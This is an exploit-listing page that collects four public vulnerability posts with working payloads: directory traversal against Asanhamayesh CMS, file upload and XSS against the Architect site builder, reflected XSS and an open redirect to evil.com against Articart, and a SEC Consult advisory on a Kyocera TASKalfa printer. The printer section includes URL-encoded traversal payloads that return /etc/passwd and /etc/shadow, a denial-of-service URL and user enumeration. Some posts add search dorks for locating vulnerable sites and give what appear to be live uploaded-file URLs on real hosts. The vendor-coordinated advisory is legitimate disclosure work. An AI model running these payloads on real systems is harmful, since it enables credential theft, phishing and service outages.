Latest exploits :: CodePwn

<pre><code>================================================================================================= | # Title : Asanhamayesh CMS 3.4.6 Directory traversal Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Dork : طراح و پشتیبان : آسان همایش (نرم افزار مدیریت همایش و کنفرانس) ویرایش 3.4.6 | ================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine . [+] use payload : /downloadfile.php?file=../../../../../../../../../../etc/passwd [+] http://127.0.0.1/itjdconfir/fa/downloadfile.php?file=../../../../../../../../../../etc/passwd ====Greetings to :=================================================================================================================== | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | ===================================================================================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : Architect - HTML and Site Builder V 2.2.3 Remote File Upload vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla Firefox 114.0.1 (64 bits) | | # Vendor : https://codecanyon.net/item/architect-html-and-site-builder/9957269 | | # Dork : "Our award-winning templates are the most beautiful way to present your ideas online." | ==================================================================================================================================== [+] P0C : [+] The script is based on Laravel framework so you can apply the vulnerability for the framework https://dl.packetstormsecurity.net/2301-exploits/laravel9470-disclose.txt [-] XSS via file upload : [+] Dorking İn Google Or Other Search Enggine. [+] Register as a member of the target site . [+] After registering, log in and go to /account/settings . [+] path : https://builder.vebto.com/storage/avatars/9SCDIW0ntFJYqaP9IfrOqhJfzNoyukqmbEOtJxH8.svg [-] Unrestricted File Upload : [+] Go to ( Dashboard/Projects/New)to create a new project or Choose a template for your project . [+] Choose Edit Image and upload your malicious file . [+] path : https://builder.vebto.com/storage/projects/1628/iGqYdWiwCUZGShvwQ4p14VLzvxbey33IN85U/images/ogSIFm8ztsQv4BBEy9Ci96utafSBsu45oe1RhL3y.htm https://builder.vebto.com/storage/projects/1628/iGqYdWiwCUZGShvwQ4p14VLzvxbey33IN85U/images/kNHGCajolk2LcxsEZq8Q5sGn9p7Pt7gO5nOO1zwz.txt https://builder.vebto.com/storage/projects/1628/iGqYdWiwCUZGShvwQ4p14VLzvxbey33IN85U/images/50otMfIHgIlJz3OFyuBMjeOSKaXs9a49YLZuaMlK.jpg https://spiritbuilder.app/storage/projects/26/7u3ps1joxTO0o1e3jZYfvb3klddh3GFzS1dh/images/kc4FLhcYIWBq7AhOHTpxWwjPxwKRe4vX8nmLBahh.php ====Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | =========================================================================================================================================== </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : http://articart-demo.livelyworks.net/ │ │ Vendor : livelyworks │ │ Software : Articart 2.0.1 │ │ Vuln Type: Reflected XSS - Open Redirect using base64 Encoding │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ## RXSS Path: /items/search GET 'search_term' parameter is vulnerable to RXSS https://website/items/search?search_term=123zr77l%22%3e%3cscript%3ealert(1)%3c%2fscript%3esadj4 ## Open Redirect An Attacker can use it to redirect a victim to an arbitrary website. This is a powerful tool in phishing campaigns, as it allows hiding the malicious webpage behind a link Path: /change-language/de_DE GET 'redirectTo' parameter is vulnerable to Open Redirect using base64 encoding https://website/change-language/de_DE?redirectTo=aHR0cHM6Ly93d3cuZXZpbC5jb20v aHR0cHM6Ly93d3cuZXZpbC5jb20v = https://www.evil.com/ [-] Done </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230705-0 > ======================================================================= title: Path traversal bypass & Denial of service product: Kyocera TASKalfa 4053ci printer vulnerable version: TASKalfa 4053ci Version <= 2VG_S000.002.561 fixed version: 2VG_S000.002.574 CVE numbers: CVE-2023-34259, CVE-2023-34260, CVE-2023-34261 impact: High homepage: https://global.kyocera.com found: 2022-12-13 by: Stefan Michlits (Office Vienna) Gorazd Jank (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Kyocera Document Solutions is leading the digital shift driving productivity and growth in the printing industry. We offer a range of exciting new options that draw on the combined resources of the Kyocera Group." Source: https://www.kyoceradocumentsolutions.com/en/our-business/inkjet/ Business recommendation: ------------------------ SEC Consult recommends Kyocera customers to install the latest updates. Furthermore, an in-depth security analysis performed by security professionals is highly advised, as the software may be affected from other security issues. Vulnerability overview/description: ----------------------------------- 1) Path Traversal - Bypass (CVE-2023-34259) A path traversal vulnerability was found by Hakan Eren ŞAN in 2020-06-06. The previous exploit can be found at: https://www.exploit-db.com/exploits/48561 Kyocera has fixed the vulnerability. It was not possible to access arbitrary files using the public exploit. However, SEC Consult have found a bypass to exploit this vulnerability again and access arbitrary files. Due to the fact that the web service is running as the user root, it was possible to access all files (e.g. /etc/shadow) on the device. 2) Denial-of-Service - Web Interface (CVE-2023-34260) The denial-of-service vulnerability is related to the path traversal vulnerability. Instead of requesting a file, a directory will be requested. Once the request is sent to the web service running on TCP port 443, the web service will become unresponsive and must be restarted. 3) User Enumeration (CVE-2023-34261) The login function on the web service running on TCP port 443 is prone to a user enumeration vulnerability. The login function will return different responses, whether the username is valid or not. Proof of concept: ----------------- 1) Path Traversal - Bypass (CVE-2023-34259) Previously, a security researcher has discovered an unauthenticated directory traversal vulnerability in the web service running on port 443. The following payload was used to access arbitrary files: https://IP/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm This vulnerability is fixed in the current version. It was not possible to access arbitrary files using the above payload. However, the vulnerability was not fixed correctly. SEC Consult identified a bypass to exploit this vulnerability again. Once the ../ sequences will be URL encoded, it is possible to bypass the fix and access arbitrary files. The following payload can be used to access the file /etc/passwd: https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm The response containing the contents of the file /etc/passwd can be seen in the following paragraph. ------------------------------------------------------------------------------- HTTP/1.1 200 OK Content-Length: 770 Accept-Encoding: identity Server: KM-MFP-http/V0.0.1 Content-Type: text/html X-Frame-Options: SAMEORIGIN root:x:0:0:root:/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh sshd:x:100:1000:Linux User,,,:/var/run/sshd:/bin/false ------------------------------------------------------------------------------- Also, it was possible to access the file /etc/shadow. The following payload can be used: https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/shadow%00index.htm The output containing the content of the file /etc/shadow as it can be seen in the following paragraph. ------------------------------------------------------------------------------- HTTP/1.1 200 OK Content-Length: 401 Accept-Encoding: identity Server: KM-MFP-http/V0.0.1 Content-Type: text/html X-Frame-Options: SAMEORIGIN root:$1$tfE2pkl/$O8uDq*************bSH.:11029:::::: daemon:*:11029:::::: bin:*:11029:::::: sys:*:11029:::::: sync:*:11029:::::: games:*:11029:::::: man:*:11029:::::: lp:*:11029:::::: mail:*:11029:::::: news:*:11029:::::: uucp:*:11029:::::: proxy:*:11029:::::: www-data:*:11029:::::: backup:*:11029:::::: list:*:11029:::::: irc:*:11029:::::: gnats:*:11029:::::: nobody:*:11029:::::: sshd:x:11029:::::: ------------------------------------------------------------------------------- As the web service is running as the user root it was possible to access the /etc/shadow file or the file has set the wrong permissions. Based on previous security assessments of Kyocera printers, it is likely that the service is running as the user root. 2) Denial-of-Service - Web Interface (CVE-2023-34260) To trigger the DoS attack it is sufficient to navigate to the URL: https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%00index.htm Once the request is sent to the web service, the web service will become unresponsive. This attack is related to the path traversal vulnerability. The difference is that in this case a folder is requested instead of a file. Apparently, this leads to an error condition in the web server causing it to be unresponsive for all users. Other applications offering a web interface (e.g., on port 8083) seem to not be affected by the attack. 3) User Enumeration (CVE-2023-34261) The user enumeration is located in the login functionality of the web interface. Submitting an existing username will result in a different server response than submitting an incorrect username. This enables attackers to enumerate existing users by submitting potential usernames till a different response is gathered. In this case, it does not matter whether the transmitted password is correct or not. The gathered information could be used to better search for default passwords or custom passwords inside of public password leaks. In case, the username does not exist, the response will return "Login-Benutzername oder Passwort falsch.", on the other hand, if the username exists the response contains "Sie können sich nicht einloggen." Vulnerable / tested versions: ----------------------------- The following product has been tested: * Kyocera TASKalfa 4053ci All versions older than "2VG_S000.002.561" are vulnerable according to the vendor. Vendor contact timeline: ------------------------ 2023-02-13: Asking for Kyocera KC-SIRT security contact through Nippon CSIRT Association; quick response: https://www.nca.gr.jp/member/kc-sirt.html (it seems only the Japanese website shows the email information) 2023-02-14: Contacting Kyocera KC-SIRT through kc-sirt@gp.kyocera.jp 2023-03-02: Contacting the vendor again, due to no response. 2023-03-06: Vendor response, KDC-PSIRT is responsible, requesting security advisory. 2023-03-13: Sending security advisory PGP-encrypted. 2023-04-19: Vendor response, vulnerabilities confirmed. 2023-05-19: Vendor response, the vulnerabilities were fixed. The patch will be released on 2023-05-26. 2023-05-22: Informing vendor that we will request CVE numbers, asking for information about affected & fixed version numbers. 2023-05-24: Vendor provides version information. 2023-06-02: Sending CVE numbers to vendor, asking for link to patch download. 2023-06-05: Vendor provides download information. 2023-07-05: Public release of security advisory. Solution: --------- The vendor provided the following download information: There are two ways to update the firmware of our products. * One is to contact the shop of purchase and update the firmware from a service person. * The other is to use the Firmware Upgrade tool. From the Kyocera Document Solutions Global website in your country, you can download this tool and latest firmware. Then you update the firmware yourself. See: https://www.kyoceradocumentsolutions.com/download/ and choose "TASKalfa4053ci" Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF S. Michlits, G. Jank / @2023 </code></pre>